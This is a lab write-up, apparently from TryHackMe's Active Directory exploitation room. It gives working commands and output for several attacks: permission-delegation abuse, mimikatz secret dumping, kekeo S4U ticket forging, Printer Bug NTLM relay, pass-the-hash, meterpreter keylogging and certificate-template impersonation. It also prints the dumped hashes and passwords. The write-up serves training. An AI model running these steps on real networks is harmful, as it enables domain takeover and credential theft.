Exploiting Permission Delegation Permission Delegation is a feature in AD that allows administrators to give specific permissions to certain users or teams. In our case, DOMAIN_USERS has genericwrite permission on IT Support Group GenericWrite: We can update any non-protected parameters of our target object. This could allow us to, for example, update the scriptPath parameter, which would cause a script to execute the next time the user logs on. Subseqently, The IT Support team is given permission to reset passwords for all users. This includes Domain Admins, which is insecure. Lets exploit: PS C:\Users\colin.lane> Add-ADGroupMember ""IT Support"" -Members ""colin.lane"" PS C:\Users\colin.lane> Get-ADGroupMember -Identity ""IT Support"" distinguishedName : CN=colin.lane,OU=Human Resources,OU=People,DC=za,DC=tryhackme,DC=loc name : colin.lane objectClass : user objectGUID : cb777a93-fadd-464f-b588-4c69f4bb0444 SamAccountName : colin.lane SID : S-1-5-21-3885271727-2693558621-2658995185-1132 PS C:\Users\colin.lane> Get-ADGroupMember -Identity ""Tier 2 Admins"" distinguishedName : CN=t2_lawrence.lewis,OU=T2 Admins,OU=Admins,DC=za,DC=tryhackme,DC=loc name : t2_lawrence.lewis objectClass : user objectGUID : 4ca61b47-93c8-44d2-987d-eca30c69d828 SamAccountName : t2_lawrence.lewis SID : S-1-5-21-3885271727-2693558621-2658995185-1893 distinguishedName : CN=t2_leon.francis,OU=T2 Admins,OU=Admins,DC=za,DC=tryhackme,DC=loc name : t2_leon.francis objectClass : user objectGUID : 854b6d40-d537-4986-b586-c40950e0d5f9 SamAccountName : t2_leon.francis SID : S-1-5-21-3885271727-2693558621-2658995185-3660 distinguishedName : CN=t2_henry.harvey,OU=T2 Admins,OU=Admins,DC=za,DC=tryhackme,DC=loc name : t2_henry.harvey objectClass : user objectGUID : a3c2db31-6362-4af7-8a3e-20e0c16a664f SamAccountName : t2_henry.harvey SID : S-1-5-21-3885271727-2693558621-2658995185-4275 PS C:\Users\colin.lane> $Password = ConvertTo-SecureString ""Password@123"" -AsPlainText -Force PS C:\Users\colin.lane> Set-ADAccountPassword -Identity ""t2_henry.harvey"" -Reset -NewPassword $Password Set-ADAccountPassword : Access is denied At line:1 char:1 + Set-ADAccountPassword -Identity ""t2_henry.harvey"" -Reset -NewPassword ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (t2_henry.harvey:ADAccount) [Set-ADAccountPassword], UnauthorizedAccessException + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirectory.Management.Commands.SetADAccountPassword PS C:\Users\colin.lane> gpupdate /force Updating policy... Computer Policy update has completed successfully. User Policy update has completed successfully. PS C:\Users\colin.lane> It will take around 10 to 15 minutes to update PS C:\Users\colin.lane> $Password = ConvertTo-SecureString ""Password@123"" -AsPlainText -Force PS C:\Users\colin.lane> Set-ADAccountPassword -Identity ""t2_henry.harvey"" -Reset -NewPassword $Password Set-ADAccountPassword : Access is denied At line:1 char:1 + Set-ADAccountPassword -Identity ""t2_henry.harvey"" -Reset -NewPassword ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : PermissionDenied: (t2_henry.harvey:ADAccount) [Set-ADAccountPassword], UnauthorizedAccessException + FullyQualifiedErrorId : ActiveDirectoryCmdlet:System.UnauthorizedAccessException,Microsoft.ActiveDirectory.Management.Commands.SetADAccountPassword PS C:\Users\colin.lane> Set-ADAccountPassword -Identity ""t2_henry.harvey"" -Reset -NewPassword $Password Set-ADAccountPassword : Access is denied PS C:\Users\colin.lane> Set-ADAccountPassword -Identity ""t2_henry.harvey"" -Reset -NewPassword $Password PS C:\Users\colin.lane> it will take some time to update ┌──(kali㉿kali)-[~/Documents/explotingad] └─$ ssh za.tryhackme.loc\\t2_henry.harvey@thmwrk1.za.tryhackme.loc za.tryhackme.loc\t2_henry.harvey@thmwrk1.za.tryhackme.loc''s password: Microsoft Windows [Version 10.0.17763.1098] (c) 2018 Microsoft Corporation. All rights reserved. za\t2_henry.harvey@THMWRK1 C:\Users\t2_henry.harvey>cd .. za\t2_henry.harvey@THMWRK1 C:\Users>cd Administrator za\t2_henry.harvey@THMWRK1 C:\Users\Administrator>cd Desktop za\t2_henry.harvey@THMWRK1 C:\Users\Administrator\Desktop>dir Volume in drive C is Windows Volume Serial Number is 1634-22A9 Directory of C:\Users\Administrator\Desktop 06/16/2022 05:09 PM <DIR> . 06/16/2022 05:09 PM <DIR> .. 04/30/2022 10:53 AM 31 flag1.txt 1 File(s) 31 bytes 2 Dir(s) 50,251,628,544 bytes free za\t2_henry.harvey@THMWRK1 C:\Users\Administrator\Desktop>type flag1.txt THM{Permission.Delegation.FTW!} za\t2_henry.harvey@THMWRK1 C:\Users\Administrator\Desktop> Exploiting Kerberos Delegation Kerberos Delegation allows one service (like a web server) to access another service (like a database) on behalf of a user. Instead of giving the web server full access, it uses the user’s permissions to retrieve data. Here is a clear and simple explanation for all types of Kerberos Delegation: What is Kerberos Delegation? Kerberos Delegation allows one service (like a web server) to access another service (like a database) on behalf of a user. Instead of giving the web server full access, it uses the user’s permissions to retrieve data. Unconstrained Delegation This is the least secure type of delegation. It allows a service to access any other service on behalf of a user without restrictions. The user’s Kerberos Ticket-Granting Ticket (TGT) is stored in memory. If an attacker compromises the service, they can steal the TGT and impersonate the user to access other services. Constrained Delegation This is more secure because it limits which specific services a service account can access on behalf of users. Example services include web apps (HTTP), file shares (CIFS), LDAP for user management, and databases (MSSQL). If an attacker compromises an account, they can only access the specific services configured for delegation. Resource-Based Constrained Delegation (RBCD) RBCD gives more control to the target service. In RBCD, instead of saying, “The web server can act on behalf of users to access the database server,” the database server itself specifies which accounts (e.g., the web server) are allowed to act on behalf of users. This is done by using an attribute called msDS-AllowedToActOnBehalfOfOtherIdentity. If an attacker has permission to configure RBCD, they can allow their own account to act on behalf of others and gain unauthorized access to the service. Lets exploit Constrained Delegration PS C:\Users\t2_henry.harvey> import-module C:\Tools\PowerView.ps1 PS C:\Users\t2_henry.harvey> Get-NetUser -TrustedToAuth logoncount : 65 badpasswordtime : 12/17/2024 8:59:08 AM distinguishedname : CN=IIS Server,CN=Users,DC=za,DC=tryhackme,DC=loc objectclass : {top, person, organizationalPerson, user} displayname : IIS Server lastlogontimestamp : 12/8/2024 5:07:23 PM userprincipalname : svcIIS@za.tryhackme.loc name : IIS Server objectsid : S-1-5-21-3885271727-2693558621-2658995185-6155 samaccountname : svcIIS codepage : 0 samaccounttype : USER_OBJECT accountexpires : NEVER countrycode : 0 whenchanged : 12/8/2024 5:07:23 PM instancetype : 4 usncreated : 78494 objectguid : 11e42287-0a25-4d73-800d-b62e2d2a2a4b sn : Server lastlogoff : 1/1/1601 12:00:00 AM msds-allowedtodelegateto : {WSMAN/THMSERVER1.za.tryhackme.loc, WSMAN/THMSERVER1, http/THMSERVER1.za.tryhackme.loc, http/THMSERVER1} objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=tryhackme,DC=loc dscorepropagationdata : 1/1/1601 12:00:00 AM serviceprincipalname : HTTP/svcServWeb.za.tryhackme.loc givenname : IIS lastlogon : 12/17/2024 9:08:01 AM badpwdcount : 0 cn : IIS Server useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD, TRUSTED_TO_AUTH_FOR_DELEGATION whencreated : 4/27/2022 11:26:21 AM primarygroupid : 513 pwdlastset : 4/29/2022 11:50:25 AM usnchanged : 172089 Note: Constrained Delegation is when an account can only delegate to specific services defined in the msds-allowedtodelegateto attribute. svcIIS account can delegate the HTTP and WSMAN services on THMSERVER1. msds-allowedtodelegateto: {WSMAN/THMSERVER1.za.tryhackme.loc, WSMAN/THMSERVER1, http/THMSERVER1.za.tryhackme.loc, http/THMSERVER1} Note: Unconstrained Delegation allows the account to delegate to any service in the domain. This is configured through the Allow Delegating to any service setting in Active Directory, and there will not be any service restrictions listed in msds-allowedtodelegateto we found a service running as svcIIS. Using Mimikatz we can now dump LSA Secrets PS C:\Tools\mimikatz_trunk\x64> .\mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53 .## ^ ##. ""A La Vie, A L''Amour"" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > https://blog.gentilkiwi.com/mimikatz ''## v ##'' Vincent LE TOUX ( vincent.letoux@gmail.com ) ''#####'' > https://pingcastle.com / https://mysmartlogon.com ***/ mimikatz # token::elevate Token Id : 0 User name : SID name : NT AUTHORITY\SYSTEM 492 {0;000003e7} 1 D 17718 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Prim ary -> Impersonated ! * Process Token : {0;001004ea} 0 D 1499133 ZA\t2_henry.harvey S-1-5-21-3885271727-26935586 21-2658995185-4275 (12g,24p) Primary * Thread Token : {0;000003e7} 1 D 1517750 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation) mimikatz # lsadump::secrets Domain : THMWRK1 SysKey : a1403e57976b472bce5f231922ca3942 Local name : THMWRK1 ( S-1-5-21-3226461851-763325627-4205969673 ) Domain name : ZA ( S-1-5-21-3885271727-2693558621-2658995185 ) Domain FQDN : za.tryhackme.loc Policy subsystem is : 1.18 LSA Key(s) : 1, default {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27} [00] {cfcff4be-beab-7d93-cfa3-edb6a9a3bf27} 929bd1cdc726d31f5eea6fa5266a09521afd0be6309a08fd604c9a 95c2af4463 Secret : $MACHINE.ACC cur/text: 0FFIKa""c[#L6T>=.s*ZW''Gz04FL&7,""VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs `&suI rmg,g GQsb%),mlWLo?6$kqP NTLM:4207d1b7e4b942da2371174b772fdf5e SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db old/text: 0FFIKa""c[#L6T>=.s*ZW''Gz04FL&7,""VjxxhLeXqmI\%Q%c..g?=olZZlnTA#J@;*8+&?neR%>l_W!w&.oz@1MDJHs `&suI rmg,g GQsb%),mlWLo?6$kqP NTLM:4207d1b7e4b942da2371174b772fdf5e SHA1:c67c43d5a5d002f67371024ef1aa22db76ab44db Secret : DefaultPassword old/text: vagrant Secret : DPAPI_SYSTEM cur/hex : 01 00 00 00 b6 54 c4 83 d9 88 10 f6 ee ae fc b7 ed 2d a2 d6 47 11 3f 8f 4a 6d 7f 72 35 b8 a2 93 3d 5c 5e 3f 03 8d 79 49 90 e7 2e e0 full: b654c483d98810f6eeaefcb7ed2da2d647113f8f4a6d7f7235b8a2933d5c5e3f038d794990e72ee0 m/u : b654c483d98810f6eeaefcb7ed2da2d647113f8f / 4a6d7f7235b8a2933d5c5e3f038d794990e72ee0 old/hex : 01 00 00 00 10 4d a3 82 e2 da 30 1f 33 d6 49 a4 c9 81 26 e5 25 59 bb 9f 8a 76 b1 5d 59 c6 87 c6 32 b7 02 0b c1 5b 24 f4 44 d0 74 31 full: 104da382e2da301f33d649a4c98126e52559bb9f8a76b15d59c687c632b7020bc15b24f444d07431 m/u : 104da382e2da301f33d649a4c98126e52559bb9f / 8a76b15d59c687c632b7020bc15b24f444d07431 Secret : NL$KM cur/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 5 8 old/hex : 10 bb 99 02 da 94 4a 26 cd ad 07 f3 62 64 53 5c a8 12 be e3 16 1f 8f 99 ae ab 97 37 c4 bc ee df 63 7c 2f 6d 07 c5 d9 5e 29 e7 ce ce 48 52 47 19 8a 03 99 ff 97 ec 7f 49 a1 79 15 d9 a0 04 ac 5 8 Secret : _SC_thmwinauth / service ''thmwinauth'' with username : svcIIS@za.tryhackme.loc cur/text: Password1@ mimikatz # token::revert * Process Token : {0;001004ea} 0 D 1499133 ZA\t2_henry.harvey S-1-5-21-3885271727-26935586 21-2658995185-4275 (12g,24p) Primary * Thread Token : no token mimikatz # * token::elevate - To dump the secrets from the registry hive, we need to impersonate the SYSTEM user. * lsadump::secrets - Mimikatz interacts with the registry hive to pull the clear text credentials. * token::revert - To drop privileges and return to the original user context after performing actions with elevated permissions. Secret : _SC_thmwinauth / service ''thmwinauth'' with username : svcIIS@za.tryhackme.loc cur/text: Password1@ we have access to the password associated with the svcIIS account, we can perform a Kerberos delegation attack. Kekeo First, we request a Ticket Granting Ticket (TGT) for the svcIIS service account in the za.tryhackme.loc domain using its credentials. This gives us initial access and authentication capability. Then, we leverage the S4U2Self and S4U2Proxy techniques to: * Impersonate the user t1_trevor.jones * Request service tickets for HTTP and WSMAN services on THMSERVER1 S4U (Service for User) requests to generate service tickets: HTTP Service Ticket: tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc WSMAN Service Ticket: tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc PS C:\Users\t2_henry.harvey> C:\Tools\kekeo\x64\kekeo.exe ___ _ kekeo 2.1 (x64) built on Dec 14 2021 11:51:55 / (''>- ""A La Vie, A L''Amour"" | K | /* * * \____/ Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) L\_ https://blog.gentilkiwi.com/kekeo (oe.eo) with 10 modules * * */ kekeo # tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@ Realm : za.tryhackme.loc (za) User : svcIIS (svcIIS) CName : svcIIS [KRB_NT_PRINCIPAL (1)] SName : krbtgt/za.tryhackme.loc [KRB_NT_SRV_INST (2)] Need PAC : Yes Auth mode : ENCRYPTION KEY 23 (rc4_hmac_nt ): 43460d636f269c709b20049cee36ae7a [kdc] name: THMDC.za.tryhackme.loc (auto) [kdc] addr: 10.200.60.101 (auto) > Ticket in file ''TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi'' kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /us er:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc Ticket : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi [krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC [krb-cred] E: [00000012] aes256_hmac [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC [enc-krb-cred] T: [12/17/2024 9:08:01 AM ; 12/17/2024 7:08:01 PM] {R:12/24/2024 9:08:01 AM} [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; 75af70e49751835ed2b8f9e [s4u2self] t1_trevor.jones [kdc] name: THMDC.za.tryhackme.loc (auto) [kdc] addr: 10.200.60.101 (auto) > Ticket in file ''TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'' Service(s): [s4u2proxy] http/THMSERVER1.za.tryhackme.loc > Ticket in file ''TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACK ME.LOC.kirbi'' kekeo # tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /us er:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc Ticket : TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi [krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC [krb-cred] E: [00000012] aes256_hmac [enc-krb-cred] P: svcIIS @ ZA.TRYHACKME.LOC [enc-krb-cred] S: krbtgt/za.tryhackme.loc @ ZA.TRYHACKME.LOC [enc-krb-cred] T: [12/17/2024 9:08:01 AM ; 12/17/2024 7:08:01 PM] {R:12/24/2024 9:08:01 AM} [enc-krb-cred] F: [40e10000] name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; [enc-krb-cred] K: ENCRYPTION KEY 18 (aes256_hmac ): 634f4c25dc505bcc53ee5f85790b5b1a71f30bc37 75af70e49751835ed2b8f9e [s4u2self] t1_trevor.jones [kdc] name: THMDC.za.tryhackme.loc (auto) [kdc] addr: 10.200.60.101 (auto) > Ticket in file ''TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_svcIIS@ZA.TRYHACKME.LOC.kirbi'' Service(s): [s4u2proxy] wsman/THMSERVER1.za.tryhackme.loc > Ticket in file ''TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHAC KME.LOC.kirbi'' kekeo # then, inject the generated tickets into the current session using Mimikatz. mimikatz # privilege::debug Privilege ''20'' OK mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.T RYHACKME.LOC.kirbi * File: ''TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kir bi'': OK mimikatz # kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TR * File: ''TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirb i'': OK mimikatz # exit Bye! Verify ticket injection and establish remote session PS C:\Users\t2_henry.harvey> klist Current LogonId is 0:0xf4448 Cached Tickets: (2) #0> Client: t1_trevor.jones @ ZA.TRYHACKME.LOC Server: http/THMSERVER1.za.tryhackme.loc @ ZA.TRYHACKME.LOC KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 12/17/2024 9:10:59 (local) End Time: 12/17/2024 19:08:01 (local) Renew Time: 12/24/2024 9:08:01 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 12/17/2024 9:11:40 (local) End Time: 12/17/2024 19:08:01 (local) Renew Time: 12/24/2024 9:08:01 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: PS C:\Users\t2_henry.harvey> New-PSSession -ComputerName thmserver1.za.tryhackme.loc Id Name ComputerName ComputerType State ConfigurationName Availability -- ---- ------------ ------------ ----- ----------------- ------------ 5 WinRM5 thmserver1.z... RemoteMachine Opened Microsoft.PowerShell Available PS C:\Users\t2_henry.harvey> Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc [thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents> whoami za\t1_trevor.jones [thmserver1.za.tryhackme.loc]: PS C:\Users\t1_trevor.jones\Documents> Exploiting Automated Relays In AD, authentication requests are constantly flying around the network. While intercepting these requests can give attackers access to sensitive resources, waiting for them to happen isn’t ideal. Machine Account Every Windows system in an AD environment has a machine account (like a user account for the computer). These accounts: Have super long, uncrackable passwords (120 UTF-16 characters). Are automatically rotated every 30 days. Are used by the system for things like syncing data, requesting certificates, and more. MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p The THMSERVER2 machine account has administrative privileges over the THMSERVER1 machine. The Printer Bug is a feature in Windows’ Print Spooler service that allows an attacker to force a machine to authenticate to any server. PS C:\Users\t2_henry.harvey> GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc GWMI : Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED)) At line:1 char:1 + GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Get-WmiObject], UnauthorizedAccessException + FullyQualifiedErrorId : System.UnauthorizedAccessException,Microsoft.PowerShell.Commands.GetWmiObjectCommand Even with “Access Denied” the attack can still proceed if smb singning is not enforced. Using Nmap, we confirmed that signing is enabled but not required. ┌──(kali㉿kali)-[~/Documents/explotingad] └─$ nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc thmserver2.za.tryhackme.loc Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-17 09:12 EST Nmap scan report for thmserver1.za.tryhackme.loc (10.200.60.201) Host is up (0.54s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Nmap scan report for thmserver2.za.tryhackme.loc (10.200.60.202) Host is up (0.30s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required Nmap done: 2 IP addresses (2 hosts up) scanned in 11.70 seconds Set Up Relaying: To listen for authentication attempts. impacket-ntlmrelayx -smb2support -t smb://10.200.60.201 -debug Trigger Authentication: We use SpoolSample.exe to exploit the Printer Bug and force THMSERVER2 to authenticate to our attack server. C:\Tools>SpoolSample.exe THMSERVER2.za.tryhackme.loc 10.10.57.180 This tricks THMSERVER2 into sending its authentication request to our malicious SMB server. ServerAdmin:500:aad3b435b51404eeaad3b435b51404ee:3279a0c6dfe15dc3fb6e9c26dd9b066c::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:92728d5173fc94a54e84f8b457af63a8::: vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e96eab5f240174fe2754efc94f6a53ae::: trevor.local:1001:aad3b435b51404eeaad3b435b51404ee:f48a444e1be49295eec9b84f412d92f3::: evil-winrm -i 10.200.60.201 -u trevor.local -H f48a444e1be49295eec9b84f412d92f3 Exploiting Users we will focus on two elements: Credential Management - How users store their credentials. In AD, this is quite important since users may have multiple sets of credentials and remembering all of them can be a hassle. Keylogging - Often, during exploitation, we need to understand how normal users interact with a system. Together with screengrabs, Keylogging can be a useful tool to gain this understanding from an attacker’s perspective. Hunting for Credentials Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\trevor.local\Documents> whoami thmserver1\trevor.local *Evil-WinRM* PS C:\Users\trevor.local\Documents> ls Directory: C:\Users\trevor.local\Documents Mode LastWriteTime Length Name ---- ------------- ------ ---- -a---- 4/30/2022 4:36 PM 2190 PasswordDatabase.kdbx -a---- 12/10/2024 3:02 PM 3252 shell.ps1 Keylogging with Meterpreter Once you get the meterpreter shell. Meterpreter includes a built-in keylogger that can capture keystrokes. However, because we’re operating under the SYSTEM context, the keylogger won’t capture user-specific activity. To address this, we need to migrate our Meterpreter session into the context of the target user. Step 1: Identify the User’s Process List processes to locate the one associated with the target user (trevor.local): meterpreter> ps | grep ""explorer"" Output: PID PPID Name Arch Session User Path --- ---- ---- ---- ------- ---- ---- 3612 3592 explorer.exe x64 1 THMSERVER1\trevor.local C:\Windows\explorer.exe Step 2: Migrate to the User’s Process Attach the session to the explorer.exe process for the trevor.local user: meterpreter> migrate 3612 [*] Migrating from 4408 to 3612... [*] Migration completed successfully. Verify the context switch: meterpreter> getuid Server username: THMSERVER1\trevor.local Step 3: Start Keylogging Enable the keylogger to capture the user’s input: meterpreter> keyscan_start Wait for the user to interact with their system. it will take some time. meterpreter > keyscan_dump Dumping captured keystrokes... meterpreter > keyscan_dump Dumping captured keystrokes... meterpreter > keyscan_dump Dumping captured keystrokes... keep<CR> <Shift>Imreallysurenoonewillguessmypassword<CR> Now, use this password for PasswordDatabase.kdbx, there you get the flag. svcServMan: Sup3rStr0ngPass!@ Exploiting GPOs In previous task, we got some creds from kdbx file. checking that accounts path in bloodhound shows some potential path. SVCSERVMAN@ZA.TRYHACKME.LOC:This user has GenericWrite permissions over the MANAGEMENT SERVER PUSHES@ZA.TRYHACKME.LOC object. MANAGEMENT SERVER PUSHES@ZA.TRYHACKME.LOC: This object has a GpLink to MANAGEMENT SERVERS@ZA.TRYHACKME.LOC, which Contains the THMSERVER2.ZA.TRYHACKME.LOC server. THMSERVER2.ZA.TRYHACKME.LOC: The target machine or resource you aim to compromise. GenericWrite Permission: The GenericWrite permission allows you to modify attributes of the MANAGEMENT SERVER PUSHES object. This can be used to edit the Group Policy Object (GPO) and push malicious configurations to the target server. GpLink Misconfiguration: The GpLink permission means the MANAGEMENT SERVER PUSHES GPO is applied to the MANAGEMENT SERVERS group. This group contains THMSERVER2.ZA.TRYHACKME.LOC. By editing the GPO, you can execute code or create backdoors on THMSERVER2. C:\Users\t2_henry.harvey>runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe Enter the password for za.tryhackme.loc\svcServMan: Attempting to start cmd.exe as user ""za.tryhackme.loc\svcServMan"" ... C:\Windows\system32>dir \\za.tryhackme.loc\SYSVOL Volume in drive \\za.tryhackme.loc\SYSVOL is Windows Volume Serial Number is 1634-22A9 Directory of \\za.tryhackme.loc\SYSVOL 04/25/2022 06:17 PM <DIR> . 04/25/2022 06:17 PM <DIR> .. 04/25/2022 06:17 PM <JUNCTION> za.tryhackme.loc [C:\Windows\SYSVOL\domain] 0 File(s) 0 bytes 3 Dir(s) 51,394,752,512 bytes free C:\Windows\system32> ┌──(kali㉿kali)-[~/Documents/explotingad] └─$ ssh za.tryhackme.loc\\colin.lane@thmserver2.za.tryhackme.loc The authenticity of host ''thmserver2.za.tryhackme.loc (10.200.60.202)'' can''t be established. ED25519 key fingerprint is SHA256:50ZqYlTFUYKTHHPzgPNzG0gSydLnknXL0Ea7lUs7tT8. This host key is known by the following other names/addresses: ~/.ssh/known_hosts:17: [hashed name] ~/.ssh/known_hosts:26: [hashed name] ~/.ssh/known_hosts:32: [hashed name] ~/.ssh/known_hosts:33: [hashed name] ~/.ssh/known_hosts:34: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added ''thmserver2.za.tryhackme.loc'' (ED25519) to the list of known hosts. za.tryhackme.loc\colin.lane@thmserver2.za.tryhackme.loc''s password: Microsoft Windows [Version 10.0.17763.1098] (c) 2018 Microsoft Corporation. All rights reserved. za\colin.lane@THMSERVER2 C:\Users\colin.lane>cd /Users za\colin.lane@THMSERVER2 C:\Users>cd Administrator za\colin.lane@THMSERVER2 C:\Users\Administrator>cd Desktop za\colin.lane@THMSERVER2 C:\Users\Administrator\Desktop>ls ''ls'' is not recognized as an internal or external command, operable program or batch file. za\colin.lane@THMSERVER2 C:\Users\Administrator\Desktop>dir Volume in drive C is Windows Volume Serial Number is 1634-22A9 Directory of C:\Users\Administrator\Desktop 06/16/2022 10:35 AM <DIR> . 06/16/2022 10:35 AM <DIR> .. 06/16/2022 06:48 PM 39 flag4.txt 06/16/2022 10:35 AM 104,407 templates.txt 2 File(s) 104,446 bytes 2 Dir(s) 51,880,484,864 bytes free za\colin.lane@THMSERVER2 C:\Users\Admini Exploiting Certificates AD Certificate Services Active Directory Certificate Services (AD CS), which is part of Microsoft’s Public Key Infrastructure (PKI). It manages digital certificates used for things like encrypting data, signing documents, and authenticating users. Certificate Templates are used to simplify the process of issuing digital certificates. They are predefined sets of rules that control what a certificate can be used for and who can request them. Normally, administrators configure these templates carefully to avoid giving normal users unnecessary access. Key Concepts PKI (Public Key Infrastructure): A system used to manage digital certificates and public-key encryption. It ensures secure communication by verifying the identity of users or systems. AD CS (Active Directory Certificate Services): This is the PKI implementation used by Microsoft, running on domain controllers to manage certificates. CA (Certificate Authority): The entity responsible for issuing certificates. Certificate Template: A predefined configuration that specifies how and when a certificate can be issued. CSR (Certificate Signing Request): A request sent to the CA to sign a certificate. EKU (Enhanced Key Usage): These are object identifiers specifying how a certificate may be used. Identifying Vulnerable Certificate Templates Enumerating Templates: Use certutil to list all configured certificate templates. certutil -Template -v > templates.txt Identifying Misconfigurations: Attackers look for templates with dangerous combinations of settings, such as: Client Authentication: The certificate can be used for client authentication. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT: Allows the requester to define the certificate’s Subject Alternative Name (SAN). CTPRIVATEKEY_FLAG_EXPORTABLE_KEY: The certificate can be exported along with its private key. Permissions: The attacker has sufficient permissions to request the certificate. Exploiting a Certificate Template Follow Tryhackme Steps >>> Use Microsoft Management Console (MMC) to request a certificate. Add Certificate then change the Common Name and provide any value and set the User Principal Name (UPN) to the account they want to impersonate (e.g., Administrator@za.tryhackme.loc). After adding this information, clicks Enroll to request the certificate. Export certificate with its private key, which is required for impersonating a user. Inject certificate with Rubeus.exe Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:za.tryhackme.loc /dc:<IP of domain controller> Use Mimikatz to ptt mimikatz # privilege::debug Privilege ''20'' OK mimikatz # kerberos::ptt admin.kirbi * File: ''administrator.kirbi'': OK mimikatz # exit 